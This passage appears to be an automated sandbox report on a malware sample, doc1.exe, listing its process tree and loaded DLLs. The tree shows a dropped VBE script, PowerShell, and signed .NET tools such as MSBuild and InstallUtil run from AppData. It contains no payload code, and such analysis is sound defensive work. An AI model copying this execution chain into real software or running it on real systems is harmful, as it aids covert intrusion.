                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" Jump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\doc1.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
